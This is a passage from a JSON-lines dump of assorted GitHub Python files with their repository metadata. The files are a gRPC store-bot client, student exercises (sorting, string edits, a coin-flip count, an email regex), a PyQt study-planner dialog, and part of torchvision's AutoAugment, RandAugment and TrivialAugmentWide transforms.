pb2_grpc.ProductsServiceStub(channel=channel)\n message = pb2.ProductRequest(product_id=product_id)\n result = await stub.GetSpecifications(message)\n return result.result\n\n async def get_product(self, product_id: str):\n async with grpc.aio.insecure_channel(f'{self.host}:{self.port}', compression=grpc.Compression.Gzip) as channel:\n stub = pb2_grpc.ProductsServiceStub(channel=channel)\n message = pb2.ProductRequest(product_id=product_id)\n return await stub.GetProduct(message)\n\n async def search(self, product_name: str):\n async with grpc.aio.insecure_channel(f'{self.host}:{self.port}', compression=grpc.Compression.Gzip) as channel:\n stub = pb2_grpc.ProductsServiceStub(channel=channel)\n message = pb2.ProductSearchRequest(product_name=product_name)\n try:\n return await stub.Search(message)\n except grpc.aio.AioRpcError as e:\n if e.code() == grpc.StatusCode.NOT_FOUND:\n return None\n\n async def get_service_center(self, city: str):\n async with grpc.aio.insecure_channel(f'{self.host}:{self.port}', compression=grpc.Compression.Gzip) as channel:\n stub = pb2_grpc.ProductsServiceStub(channel=channel)\n message = pb2.ServiceCenterRequest(city=city)\n results = await stub.GetServiceCenter(message)\n return [ServiceCenterSchema(**MessageToDict(i)) for i in results.results]\n","repo_name":"sb-elliot-7s/telegram-bot-store","sub_path":"bot/grpc_service.py","file_name":"grpc_service.py","file_ext":"py","file_size_in_byte":3754,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"73889282330","text":"def sort(nums):\n for i in range(len(nums) - 1):\n minpos = i\n k = len(nums)\n for j in range(i, k):\n if nums[j] < nums[minpos]:\n minpos = j\n temp = nums[i]\n nums[i] = nums[minpos]\n nums[minpos] = temp\n\n\ndef input_data():\n i = input(\"\\nEnter the numbers : \").strip().split()\n return i\n\n\n# Basic way of getting input from the user\n# n = int(input(\"Enter number of elements : \"))\n# iterating till the range\n# for i in range(0, n):\n# ele = int(input())\n# lst.append(ele) # adding the element\n# print(lst)\n\n# using map and exception handling to get the input\ntry:\n print(\"Please use a [space] between each input.\")\n lst = list(map(int, input_data()))\n print(\"Unsorted list: \", lst)\n sort(lst)\n print(\"Sorted list: \", lst)\nexcept:\n print(\"Wrong inputs. Only use Int values.\")\n","repo_name":"GhostBat101/SomeBasicStuffs","sub_path":"selectionsort.py","file_name":"selectionsort.py","file_ext":"py","file_size_in_byte":870,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"18156591555","text":"from typing import Generator\nimport click\nfrom rich.markdown import Markdown\nfrom rich.console import Console\nfrom rich.live import Live\nfrom rich.style import Style\n\n\nclass CliView:\n COPY_INDICATOR = \"(press {index} to copy)\"\n STYLES = {\n \"title\": Style(color=\"bright_yellow\", bold=True, underline=True),\n \"success\": Style(color=\"green\"),\n \"error\": Style(color=\"bright_red\"),\n \"info\": Style(color=\"sky_blue3\"),\n }\n\n def __init__(self):\n self.console = Console()\n\n def get_user_input(self):\n first_line = click.prompt(\"Prompt >\", default=\"\", show_default=False)\n lines = [first_line]\n while True:\n line = input()\n if line:\n lines.append(line)\n else:\n break\n return \"\\n\".join(lines)\n\n def show_output(self, message) -> list[str]:\n markdown = Markdown(message)\n strings_to_copy = self._append_copy_marks_to_markdown(markdown)\n self.console.print(markdown)\n return strings_to_copy\n\n def clear(self):\n self.console.clear()\n\n def display_live_updates_from_generator(\n self, text_generator: Generator\n ) -> tuple[str, list[str]]:\n \"\"\"Displays content from the generator in real-time and returns the final content and copy-strings.\n\n Args:\n text_generator (Generator): Yields chunks of text to be displayed.\n\n Returns:\n tuple[str, list[str]]: Final displayed text and list of strings that can be copied.\n \"\"\"\n accumulated_text = \"Assistant >: \"\n strings_to_copy = []\n\n with Live(\n refresh_per_second=4\n ) as live: # Update 4 times a second for fluidity\n try:\n for chunk in text_generator:\n accumulated_text += chunk\n markdown_content = Markdown(accumulated_text, code_theme=\"\")\n strings_to_copy = self._append_copy_marks_to_markdown(\n markdown_content\n )\n live.update(markdown_content)\n except Exception as e:\n self.show_output(f\"An error occurred: {e}\")\n # Handle or log the error accordingly.\n\n return accumulated_text, strings_to_copy\n\n def _append_copy_marks_to_markdown(self, markdown: Markdown) -> list[str]:\n \"\"\"Appends copy marks to code elements in markdown and returns list of code strings.\n\n Args:\n markdown (Markdown): Markdown content to be modified.\n\n Returns:\n list[str]: List of code strings from the markdown.\n \"\"\"\n strings_to_copy = []\n for token in markdown.parsed:\n if token.tag == \"code\":\n strings_to_copy.append(token.content)\n token.content += self.COPY_INDICATOR.format(\n index=len(strings_to_copy)\n )\n return strings_to_copy\n\n def print_info(self, message: str):\n self.console.print(message, style=self.STYLES[\"info\"])\n\n # self.console.print(, )\n","repo_name":"kornatskyi/HelperAI","sub_path":"hai/view/cli_view.py","file_name":"cli_view.py","file_ext":"py","file_size_in_byte":3103,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"18418043240","text":"# good morning sumanth gowda\n\nstr=input(\"enter the string\")\nnew_str = ''\nfor char in range (0,len(str)):\n if(str[char]=='o'):\n new_str += 'z'\n else:\n new_str += str[char]\n\nprint(\"new string:\")\nprint(new_str)","repo_name":"sumi913/Assignments","sub_path":"PythonAssignment8/9.py","file_name":"9.py","file_ext":"py","file_size_in_byte":227,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"8944850649","text":"import os\nimport re\n\nfilename = 'kishoreresume.txt'\nnewfilename = 'result.txt'\n\nos.path.isdir(\"C:/Users/kishore/Downloads/pdf_convert\")\ndata = open(filename,'r')\na = data.read()\n\nr = re.compile(r'(\\b[\\w.]+@+[\\w.]+.+[\\w.]\\b)')\nresults = r.findall(a)\nemail = \"\"\nfor x in results:\n\temail += str(x)+\"\\n\"\n\ndef writefile():\n\tf = open(newfilename, 'w')\n\tf.write(email)\n\tf.close()\n\tprint (\"File written.\")\nwritefile();","repo_name":"kishore1996/training","sub_path":"regex.py","file_name":"regex.py","file_ext":"py","file_size_in_byte":410,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"6966713240","text":"# Определите минимальное число монеток, которые нужно перевернуть,\n# чтобы все монетки были повернуты вверх одной и той же стороной.\n\nn = int(input('Введите количество монеток на столе: '))\n\norel = 0\nreshka = 0\n\nfor i in range(1,n+1):\n print('Если монетка номер ', i, 'лежит орлом вверх введите 1, если решкой введите 0', end='')\n monetka = int(input(': '))\n if monetka == 1:\n orel +=1\n else:\n reshka +=1\n\nif orel > reshka:\n print('Нужно перевернуть ', reshka, 'монет с решки на орла')\nelif orel < reshka:\n print('Нужно перевернуть ', orel, 'монет с орла на решку')\nelif orel == reshka:\n print('Нужно перевернуть ', orel, 'одинаково лежащих монет')","repo_name":"VinnieThePoooh/GB_Py_DZ_2","sub_path":"folder1/task1.py","file_name":"task1.py","file_ext":"py","file_size_in_byte":980,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"28402825769","text":"import sys, os, datetime\r\nfrom PyQt4 import QtCore, QtGui, uic, QtSql\r\nimport sqlite3\r\nimport calendar_mod\r\nfrom createTask_auto import *\r\nclass MyForm(QtGui.QDialog):\r\n def __init__(self,parent=None):\r\n QtGui.QWidget.__init__(self, parent)\r\n self.ui = Ui_Dialog()\r\n self.ui.setupUi(self)\r\n dbfile=\"studentplanner.db\"\r\n self.conn=sqlite3.connect(dbfile)\r\n self.ui.btn_start.clicked.connect(self.start)\r\n self.ui.btn_end.clicked.connect(self.end)\r\n self.ui.btn_process.clicked.connect(self.process)\r\n if os.path.exists(dbfile):\r\n db=QtSql.QSqlDatabase.addDatabase('QSQLITE')\r\n db.setDatabaseName(dbfile)\r\n db.open()\r\n else:\r\n QtQui.QMessageBox.critical(self,\"Critical Error\", \"Database file was not found here\")\r\n return None\r\n self.display()\r\n\r\n def getuser(self):\r\n cursor=self.conn.cursor()\r\n statement=\"select username from current_user where user=\"+\"'\"+\"1\"+\"'\"\r\n cursor.execute(statement)\r\n self.conn.commit()\r\n row=cursor.fetchall()\r\n row=str(row)\r\n row=row[3:8]\r\n return row\r\n\r\n def start(self):\r\n calendar = calendar_mod.MyForm(self)\r\n calendar.exec_()\r\n date = calendar.getdate()\r\n print(date)\r\n self.ui.de_start.setDisplayFormat('MMM d yyyy')\r\n self.ui.de_start.setDate(date)\r\n\r\n def end(self):\r\n calendar = calendar_mod.MyForm(self)\r\n calendar.exec_()\r\n date = calendar.getdate()\r\n print(date)\r\n self.ui.de_end.setDisplayFormat('MMM d yyyy')\r\n self.ui.de_end.setDate(date)\r\n\r\n def display(self):\r\n cursor=self.conn.cursor()\r\n self.ui.lw_activity.clear()\r\n self.ui.lw_activity.addItem(\"activity_id\\tactivity_name\\tactivity_type\")\r\n self.activity=self.getuser()+\"_activities\"\r\n cursor.execute(\"select activity_id,activity_name,activity_type from \"+self.activity+\" order by activity_id asc\")\r\n self.conn.commit()\r\n row=cursor.fetchall()\r\n print(row)\r\n for r in row:\r\n ac_id,ac_name,ac_type = r\r\n self.entry=str(ac_id)+\"\\t\"+str(ac_name)+\"\\t\"+str(ac_type)\r\n self.ui.lw_activity.addItem(self.entry)\r\n \r\n def process(self):\r\n name=self.ui.lne_task.text()\r\n self.item = self.ui.lw_activity.item(self.ui.lw_activity.currentRow()).text()\r\n self.item=str(self.item)\r\n ans=self.item\r\n end=ans.find(\"\\t\",2,len(ans))\r\n self.activity=str(self.item[2:end])\r\n self.type=str(self.item[end+1:])\r\n print(self.type)\r\n print(self.activity)\r\n assignedby=str(self.ui.lne_assignedby.text())\r\n duration=str(self.ui.lne_duration.text())\r\n priority=str(self.ui.lne_priority.text())\r\n start=self.ui.de_start.date()\r\n start=self.convertdate(start)\r\n end=self.ui.de_end.date()\r\n end=self.convertdate(end)\r\n print(start)\r\n print(end)\r\n datepriority=self.deadlinePriority(end)\r\n totalpriority=round(self.totalPriority(datepriority,int(priority)),0)\r\n \r\n ans=self.is_number(duration)\r\n if ans==True and priority.isdigit()==True:\r\n if int(priority)>=0 and int(priority)<=5:\r\n cursor=self.conn.cursor()\r\n self.tasks=self.getuser()+\"_tasks\"\r\n statement=\"insert into \"+self.tasks+\" (task_name,task_activity,task_type,assigned_by,duration,start_date,end_date,user_priority,date_priority,total_priority,status) VALUES (\"+'\"'+name+'\",\"'+self.activity+'\",\"'+self.type+'\",\"'+assignedby+'\",'+str(duration)+',\"'+start+'\",\"'+end+'\",'+str(priority)+\",\"+str(datepriority)+\",\"+str(totalpriority)+\",'pending')\"\r\n print(statement)\r\n cursor.execute(statement)\r\n self.conn.commit()\r\n self.close()\r\n\r\n else:\r\n QtGui.QMessageBox.critical(self,\"Critical Error\", \"Wrong data type entered in duration or priority. Please try again.\")\r\n\r\n def is_number(self,num):\r\n try:\r\n float(num)\r\n return True\r\n except ValueError:\r\n return False\r\n\r\n def deadlinePriority(self,deadline):#inputs a string\r\n newtoday=datetime.datetime.now()\r\n print(newtoday)\r\n todayyear=newtoday.year\r\n todaymonth=newtoday.month\r\n todayday=newtoday.day\r\n today=datetime.date(todayyear,todaymonth,todayday)\r\n datePriority = 0\r\n dMonth = int(deadline[3]+deadline[4])\r\n dYear = int(deadline[6]+deadline[7]+deadline[8]+deadline[9])\r\n dDay= int(deadline[0]+deadline[1])\r\n d=datetime.date(dYear,dMonth,dDay)\r\n print(d)\r\n print(today)\r\n dif=(d-today).days\r\n dif=int(dif)\r\n print(dif)\r\n d2= today.day\r\n dm = today.month\r\n dy = today.year\r\n if dif<=1:\r\n datePriority= 5\r\n elif dif<=3:\r\n datePriority= 4\r\n elif dif<=7:\r\n datePriority= 3\r\n elif dif<=14:\r\n datePriority= 2\r\n else:\r\n datePriority= 1\r\n return (datePriority)\r\n \r\n def totalPriority(self,deadlinePriority, userPriority): #both are from 1-5\r\n return (deadlinePriority*40/3+userPriority*20/3)\r\n\r\n\r\n def convertdate(self,date):\r\n selecteddate=str(date)\r\n if selecteddate[29]==')':\r\n selecteddate=selecteddate[19:29]\r\n else:\r\n selecteddate=selecteddate[19:30]\r\n print(\"\\t\\t\\t\"+selecteddate)\r\n dateselect=selecteddate.split(\", \")\r\n day=dateselect[2]\r\n month=dateselect[1]\r\n year=dateselect[0]\r\n newday=\"\"\r\n for j in day:\r\n if j=='[' or j==\"'\" or j=='(':\r\n pass\r\n else:\r\n newday=newday+j\r\n newyear=\"\"\r\n for k in year:\r\n if k==']' or k==\"'\" or k==')':\r\n pass\r\n else:\r\n newyear=newyear+k\r\n \r\n if len(newday)==1:\r\n newday=\"0\"+str(newday)\r\n \r\n if len(month)==1:\r\n month=\"0\"+str(month)\r\n dateoftask=newday+\"/\"+month+\"/\"+year\r\n return dateoftask\r\n\r\nif __name__==\"__main__\":\r\n app=QtGui.QApplication(sys.argv)\r\n myapp=MyForm()\r\n myapp.show()\r\n sys.exit(app.exec_())\r\n \r\n","repo_name":"kohlsy/StudentPlanner","sub_path":"createTask_mod.py","file_name":"createTask_mod.py","file_ext":"py","file_size_in_byte":6630,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"17994744835","text":"import math\nfrom typing import Any, Callable, Dict, List, Optional, Tuple, Type, Union\n\nimport PIL.Image\nimport torch\n\nfrom torch.utils._pytree import tree_flatten, tree_unflatten, TreeSpec\nfrom torchvision.prototype import features\nfrom torchvision.prototype.transforms import AutoAugmentPolicy, functional as F, InterpolationMode, Transform\nfrom torchvision.prototype.transforms.functional._meta import get_spatial_size\nfrom torchvision.transforms import functional_tensor as _FT\n\nfrom ._utils import _isinstance, _setup_fill_arg\n\n\nclass _AutoAugmentBase(Transform):\n def __init__(\n self,\n *,\n interpolation: InterpolationMode = InterpolationMode.NEAREST,\n fill: Union[features.FillType, Dict[Type, features.FillType]] = None,\n ) -> None:\n super().__init__()\n self.interpolation = interpolation\n self.fill = _setup_fill_arg(fill)\n\n def _get_random_item(self, dct: Dict[str, Tuple[Callable, bool]]) -> Tuple[str, Tuple[Callable, bool]]:\n keys = tuple(dct.keys())\n key = keys[int(torch.randint(len(keys), ()))]\n return key, dct[key]\n\n def _flatten_and_extract_image_or_video(\n self,\n inputs: Any,\n unsupported_types: Tuple[Type, ...] = (features.BoundingBox, features.Mask),\n ) -> Tuple[Tuple[List[Any], TreeSpec, int], Union[features.ImageType, features.VideoType]]:\n flat_inputs, spec = tree_flatten(inputs if len(inputs) > 1 else inputs[0])\n\n image_or_videos = []\n for idx, inpt in enumerate(flat_inputs):\n if _isinstance(inpt, (features.Image, PIL.Image.Image, features.is_simple_tensor, features.Video)):\n image_or_videos.append((idx, inpt))\n elif isinstance(inpt, unsupported_types):\n raise TypeError(f\"Inputs of type {type(inpt).__name__} are not supported by {type(self).__name__}()\")\n\n if not image_or_videos:\n raise TypeError(\"Found no image in the sample.\")\n if len(image_or_videos) > 1:\n raise TypeError(\n f\"Auto augment transformations are only properly defined for a single image or video, \"\n f\"but found {len(image_or_videos)}.\"\n )\n\n idx, image_or_video = image_or_videos[0]\n return (flat_inputs, spec, idx), image_or_video\n\n def _unflatten_and_insert_image_or_video(\n self,\n flat_inputs_with_spec: Tuple[List[Any], TreeSpec, int],\n image_or_video: Union[features.ImageType, features.VideoType],\n ) -> Any:\n flat_inputs, spec, idx = flat_inputs_with_spec\n flat_inputs[idx] = image_or_video\n return tree_unflatten(flat_inputs, spec)\n\n def _apply_image_or_video_transform(\n self,\n image: Union[features.ImageType, features.VideoType],\n transform_id: str,\n magnitude: float,\n interpolation: InterpolationMode,\n fill: Dict[Type, features.FillTypeJIT],\n ) -> Union[features.ImageType, features.VideoType]:\n fill_ = fill[type(image)]\n\n if transform_id == \"Identity\":\n return image\n elif transform_id == \"ShearX\":\n # magnitude should be arctan(magnitude)\n # official autoaug: (1, level, 0, 0, 1, 0)\n # https://github.com/tensorflow/models/blob/dd02069717128186b88afa8d857ce57d17957f03/research/autoaugment/augmentation_transforms.py#L290\n # compared to\n # torchvision: (1, tan(level), 0, 0, 1, 0)\n # https://github.com/pytorch/vision/blob/0c2373d0bba3499e95776e7936e207d8a1676e65/torchvision/transforms/functional.py#L976\n return F.affine(\n image,\n angle=0.0,\n translate=[0, 0],\n scale=1.0,\n shear=[math.degrees(math.atan(magnitude)), 0.0],\n interpolation=interpolation,\n fill=fill_,\n center=[0, 0],\n )\n elif transform_id == \"ShearY\":\n # magnitude should be arctan(magnitude)\n # See above\n return F.affine(\n image,\n angle=0.0,\n translate=[0, 0],\n scale=1.0,\n shear=[0.0, math.degrees(math.atan(magnitude))],\n interpolation=interpolation,\n fill=fill_,\n center=[0, 0],\n )\n elif transform_id == \"TranslateX\":\n return F.affine(\n image,\n angle=0.0,\n translate=[int(magnitude), 0],\n scale=1.0,\n interpolation=interpolation,\n shear=[0.0, 0.0],\n fill=fill_,\n )\n elif transform_id == \"TranslateY\":\n return F.affine(\n image,\n angle=0.0,\n translate=[0, int(magnitude)],\n scale=1.0,\n interpolation=interpolation,\n shear=[0.0, 0.0],\n fill=fill_,\n )\n elif transform_id == \"Rotate\":\n return F.rotate(image, angle=magnitude, interpolation=interpolation, fill=fill_)\n elif transform_id == \"Brightness\":\n return F.adjust_brightness(image, brightness_factor=1.0 + magnitude)\n elif transform_id == \"Color\":\n return F.adjust_saturation(image, saturation_factor=1.0 + magnitude)\n elif transform_id == \"Contrast\":\n return F.adjust_contrast(image, contrast_factor=1.0 + magnitude)\n elif transform_id == \"Sharpness\":\n return F.adjust_sharpness(image, sharpness_factor=1.0 + magnitude)\n elif transform_id == \"Posterize\":\n return F.posterize(image, bits=int(magnitude))\n elif transform_id == \"Solarize\":\n bound = _FT._max_value(image.dtype) if isinstance(image, torch.Tensor) else 255.0\n return F.solarize(image, threshold=bound * magnitude)\n elif transform_id == \"AutoContrast\":\n return F.autocontrast(image)\n elif transform_id == \"Equalize\":\n return F.equalize(image)\n elif transform_id == \"Invert\":\n return F.invert(image)\n else:\n raise ValueError(f\"No transform available for {transform_id}\")\n\n\nclass AutoAugment(_AutoAugmentBase):\n _AUGMENTATION_SPACE = {\n \"ShearX\": (lambda num_bins, height, width: torch.linspace(0.0, 0.3, num_bins), True),\n \"ShearY\": (lambda num_bins, height, width: torch.linspace(0.0, 0.3, num_bins), True),\n \"TranslateX\": (\n lambda num_bins, height, width: torch.linspace(0.0, 150.0 / 331.0 * width, num_bins),\n True,\n ),\n \"TranslateY\": (\n lambda num_bins, height, width: torch.linspace(0.0, 150.0 / 331.0 * height, num_bins),\n True,\n ),\n \"Rotate\": (lambda num_bins, height, width: torch.linspace(0.0, 30.0, num_bins), True),\n \"Brightness\": (lambda num_bins, height, width: torch.linspace(0.0, 0.9, num_bins), True),\n \"Color\": (lambda num_bins, height, width: torch.linspace(0.0, 0.9, num_bins), True),\n \"Contrast\": (lambda num_bins, height, width: torch.linspace(0.0, 0.9, num_bins), True),\n \"Sharpness\": (lambda num_bins, height, width: torch.linspace(0.0, 0.9, num_bins), True),\n \"Posterize\": (\n lambda num_bins, height, width: (8 - (torch.arange(num_bins) / ((num_bins - 1) / 4))).round().int(),\n False,\n ),\n \"Solarize\": (lambda num_bins, height, width: torch.linspace(1.0, 0.0, num_bins), False),\n \"AutoContrast\": (lambda num_bins, height, width: None, False),\n \"Equalize\": (lambda num_bins, height, width: None, False),\n \"Invert\": (lambda num_bins, height, width: None, False),\n }\n\n def __init__(\n self,\n policy: AutoAugmentPolicy = AutoAugmentPolicy.IMAGENET,\n interpolation: InterpolationMode = InterpolationMode.NEAREST,\n fill: Union[features.FillType, Dict[Type, features.FillType]] = None,\n ) -> None:\n super().__init__(interpolation=interpolation, fill=fill)\n self.policy = policy\n self._policies = self._get_policies(policy)\n\n def _get_policies(\n self, policy: AutoAugmentPolicy\n ) -> List[Tuple[Tuple[str, float, Optional[int]], Tuple[str, float, Optional[int]]]]:\n if policy == AutoAugmentPolicy.IMAGENET:\n return [\n ((\"Posterize\", 0.4, 8), (\"Rotate\", 0.6, 9)),\n ((\"Solarize\", 0.6, 5), (\"AutoContrast\", 0.6, None)),\n ((\"Equalize\", 0.8, None), (\"Equalize\", 0.6, None)),\n ((\"Posterize\", 0.6, 7), (\"Posterize\", 0.6, 6)),\n ((\"Equalize\", 0.4, None), (\"Solarize\", 0.2, 4)),\n ((\"Equalize\", 0.4, None), (\"Rotate\", 0.8, 8)),\n ((\"Solarize\", 0.6, 3), (\"Equalize\", 0.6, None)),\n ((\"Posterize\", 0.8, 5), (\"Equalize\", 1.0, None)),\n ((\"Rotate\", 0.2, 3), (\"Solarize\", 0.6, 8)),\n ((\"Equalize\", 0.6, None), (\"Posterize\", 0.4, 6)),\n ((\"Rotate\", 0.8, 8), (\"Color\", 0.4, 0)),\n ((\"Rotate\", 0.4, 9), (\"Equalize\", 0.6, None)),\n ((\"Equalize\", 0.0, None), (\"Equalize\", 0.8, None)),\n ((\"Invert\", 0.6, None), (\"Equalize\", 1.0, None)),\n ((\"Color\", 0.6, 4), (\"Contrast\", 1.0, 8)),\n ((\"Rotate\", 0.8, 8), (\"Color\", 1.0, 2)),\n ((\"Color\", 0.8, 8), (\"Solarize\", 0.8, 7)),\n ((\"Sharpness\", 0.4, 7), (\"Invert\", 0.6, None)),\n ((\"ShearX\", 0.6, 5), (\"Equalize\", 1.0, None)),\n ((\"Color\", 0.4, 0), (\"Equalize\", 0.6, None)),\n ((\"Equalize\", 0.4, None), (\"Solarize\", 0.2, 4)),\n ((\"Solarize\", 0.6, 5), (\"AutoContrast\", 0.6, None)),\n ((\"Invert\", 0.6, None), (\"Equalize\", 1.0, None)),\n ((\"Color\", 0.6, 4), (\"Contrast\", 1.0, 8)),\n ((\"Equalize\", 0.8, None), (\"Equalize\", 0.6, None)),\n ]\n elif policy == AutoAugmentPolicy.CIFAR10:\n return [\n ((\"Invert\", 0.1, None), (\"Contrast\", 0.2, 6)),\n ((\"Rotate\", 0.7, 2), (\"TranslateX\", 0.3, 9)),\n ((\"Sharpness\", 0.8, 1), (\"Sharpness\", 0.9, 3)),\n ((\"ShearY\", 0.5, 8), (\"TranslateY\", 0.7, 9)),\n ((\"AutoContrast\", 0.5, None), (\"Equalize\", 0.9, None)),\n ((\"ShearY\", 0.2, 7), (\"Posterize\", 0.3, 7)),\n ((\"Color\", 0.4, 3), (\"Brightness\", 0.6, 7)),\n ((\"Sharpness\", 0.3, 9), (\"Brightness\", 0.7, 9)),\n ((\"Equalize\", 0.6, None), (\"Equalize\", 0.5, None)),\n ((\"Contrast\", 0.6, 7), (\"Sharpness\", 0.6, 5)),\n ((\"Color\", 0.7, 7), (\"TranslateX\", 0.5, 8)),\n ((\"Equalize\", 0.3, None), (\"AutoContrast\", 0.4, None)),\n ((\"TranslateY\", 0.4, 3), (\"Sharpness\", 0.2, 6)),\n ((\"Brightness\", 0.9, 6), (\"Color\", 0.2, 8)),\n ((\"Solarize\", 0.5, 2), (\"Invert\", 0.0, None)),\n ((\"Equalize\", 0.2, None), (\"AutoContrast\", 0.6, None)),\n ((\"Equalize\", 0.2, None), (\"Equalize\", 0.6, None)),\n ((\"Color\", 0.9, 9), (\"Equalize\", 0.6, None)),\n ((\"AutoContrast\", 0.8, None), (\"Solarize\", 0.2, 8)),\n ((\"Brightness\", 0.1, 3), (\"Color\", 0.7, 0)),\n ((\"Solarize\", 0.4, 5), (\"AutoContrast\", 0.9, None)),\n ((\"TranslateY\", 0.9, 9), (\"TranslateY\", 0.7, 9)),\n ((\"AutoContrast\", 0.9, None), (\"Solarize\", 0.8, 3)),\n ((\"Equalize\", 0.8, None), (\"Invert\", 0.1, None)),\n ((\"TranslateY\", 0.7, 9), (\"AutoContrast\", 0.9, None)),\n ]\n elif policy == AutoAugmentPolicy.SVHN:\n return [\n ((\"ShearX\", 0.9, 4), (\"Invert\", 0.2, None)),\n ((\"ShearY\", 0.9, 8), (\"Invert\", 0.7, None)),\n ((\"Equalize\", 0.6, None), (\"Solarize\", 0.6, 6)),\n ((\"Invert\", 0.9, None), (\"Equalize\", 0.6, None)),\n ((\"Equalize\", 0.6, None), (\"Rotate\", 0.9, 3)),\n ((\"ShearX\", 0.9, 4), (\"AutoContrast\", 0.8, None)),\n ((\"ShearY\", 0.9, 8), (\"Invert\", 0.4, None)),\n ((\"ShearY\", 0.9, 5), (\"Solarize\", 0.2, 6)),\n ((\"Invert\", 0.9, None), (\"AutoContrast\", 0.8, None)),\n ((\"Equalize\", 0.6, None), (\"Rotate\", 0.9, 3)),\n ((\"ShearX\", 0.9, 4), (\"Solarize\", 0.3, 3)),\n ((\"ShearY\", 0.8, 8), (\"Invert\", 0.7, None)),\n ((\"Equalize\", 0.9, None), (\"TranslateY\", 0.6, 6)),\n ((\"Invert\", 0.9, None), (\"Equalize\", 0.6, None)),\n ((\"Contrast\", 0.3, 3), (\"Rotate\", 0.8, 4)),\n ((\"Invert\", 0.8, None), (\"TranslateY\", 0.0, 2)),\n ((\"ShearY\", 0.7, 6), (\"Solarize\", 0.4, 8)),\n ((\"Invert\", 0.6, None), (\"Rotate\", 0.8, 4)),\n ((\"ShearY\", 0.3, 7), (\"TranslateX\", 0.9, 3)),\n ((\"ShearX\", 0.1, 6), (\"Invert\", 0.6, None)),\n ((\"Solarize\", 0.7, 2), (\"TranslateY\", 0.6, 7)),\n ((\"ShearY\", 0.8, 4), (\"Invert\", 0.8, None)),\n ((\"ShearX\", 0.7, 9), (\"TranslateY\", 0.8, 3)),\n ((\"ShearY\", 0.8, 5), (\"AutoContrast\", 0.7, None)),\n ((\"ShearX\", 0.7, 2), (\"Invert\", 0.1, None)),\n ]\n else:\n raise ValueError(f\"The provided policy {policy} is not recognized.\")\n\n def forward(self, *inputs: Any) -> Any:\n flat_inputs_with_spec, image_or_video = self._flatten_and_extract_image_or_video(inputs)\n height, width = get_spatial_size(image_or_video)\n\n policy = self._policies[int(torch.randint(len(self._policies), ()))]\n\n for transform_id, probability, magnitude_idx in policy:\n if not torch.rand(()) <= probability:\n continue\n\n magnitudes_fn, signed = self._AUGMENTATION_SPACE[transform_id]\n\n magnitudes = magnitudes_fn(10, height, width)\n if magnitudes is not None:\n magnitude = float(magnitudes[magnitude_idx])\n if signed and torch.rand(()) <= 0.5:\n magnitude *= -1\n else:\n magnitude = 0.0\n\n image_or_video = self._apply_image_or_video_transform(\n image_or_video, transform_id, magnitude, interpolation=self.interpolation, fill=self.fill\n )\n\n return self._unflatten_and_insert_image_or_video(flat_inputs_with_spec, image_or_video)\n\n\nclass RandAugment(_AutoAugmentBase):\n _AUGMENTATION_SPACE = {\n \"Identity\": (lambda num_bins, height, width: None, False),\n \"ShearX\": (lambda num_bins, height, width: torch.linspace(0.0, 0.3, num_bins), True),\n \"ShearY\": (lambda num_bins, height, width: torch.linspace(0.0, 0.3, num_bins), True),\n \"TranslateX\": (\n lambda num_bins, height, width: torch.linspace(0.0, 150.0 / 331.0 * width, num_bins),\n True,\n ),\n \"TranslateY\": (\n lambda num_bins, height, width: torch.linspace(0.0, 150.0 / 331.0 * height, num_bins),\n True,\n ),\n \"Rotate\": (lambda num_bins, height, width: torch.linspace(0.0, 30.0, num_bins), True),\n \"Brightness\": (lambda num_bins, height, width: torch.linspace(0.0, 0.9, num_bins), True),\n \"Color\": (lambda num_bins, height, width: torch.linspace(0.0, 0.9, num_bins), True),\n \"Contrast\": (lambda num_bins, height, width: torch.linspace(0.0, 0.9, num_bins), True),\n \"Sharpness\": (lambda num_bins, height, width: torch.linspace(0.0, 0.9, num_bins), True),\n \"Posterize\": (\n lambda num_bins, height, width: (8 - (torch.arange(num_bins) / ((num_bins - 1) / 4))).round().int(),\n False,\n ),\n \"Solarize\": (lambda num_bins, height, width: torch.linspace(1.0, 0.0, num_bins), False),\n \"AutoContrast\": (lambda num_bins, height, width: None, False),\n \"Equalize\": (lambda num_bins, height, width: None, False),\n }\n\n def __init__(\n self,\n num_ops: int = 2,\n magnitude: int = 9,\n num_magnitude_bins: int = 31,\n interpolation: InterpolationMode = InterpolationMode.NEAREST,\n fill: Union[features.FillType, Dict[Type, features.FillType]] = None,\n ) -> None:\n super().__init__(interpolation=interpolation, fill=fill)\n self.num_ops = num_ops\n self.magnitude = magnitude\n self.num_magnitude_bins = num_magnitude_bins\n\n def forward(self, *inputs: Any) -> Any:\n flat_inputs_with_spec, image_or_video = self._flatten_and_extract_image_or_video(inputs)\n height, width = get_spatial_size(image_or_video)\n\n for _ in range(self.num_ops):\n transform_id, (magnitudes_fn, signed) = self._get_random_item(self._AUGMENTATION_SPACE)\n magnitudes = magnitudes_fn(self.num_magnitude_bins, height, width)\n if magnitudes is not None:\n magnitude = float(magnitudes[self.magnitude])\n if signed and torch.rand(()) <= 0.5:\n magnitude *= -1\n else:\n magnitude = 0.0\n image_or_video = self._apply_image_or_video_transform(\n image_or_video, transform_id, magnitude, interpolation=self.interpolation, fill=self.fill\n )\n\n return self._unflatten_and_insert_image_or_video(flat_inputs_with_spec, image_or_video)\n\n\nclass TrivialAugmentWide(_AutoAugmentBase):\n _AUGMENTATION_SPACE = {\n \"Identity\": (lambda num_bins, height, width: None, False),\n \"ShearX\": (lambda num_bins, height, width: torch.linspace(0.0, 0.99, num_bins), True),\n \"ShearY\": (lambda num_bins, height, width: torch.linspace(0.0, 0.99, num_bins), True),\n \"TranslateX\": (lambda num_bins, height, width: torch.linspace(0.0, 32.0, num_bins), True),\n \"TranslateY\": (lambda num_bins, height, width: torch.linspace(0.0, 32.0, num_bins), True),\n \"Rotate\": (lambda num_bins, height, width: torch.linspace(0.0, 135.0, num_bins), True),\n \"Brightness\": (lambda num_bins, height, width: torch.linspace(0.0, 0.99, num_bins), True),\n \"Color\": (lambda num_bins, height, width: torch.linspace(0.0, 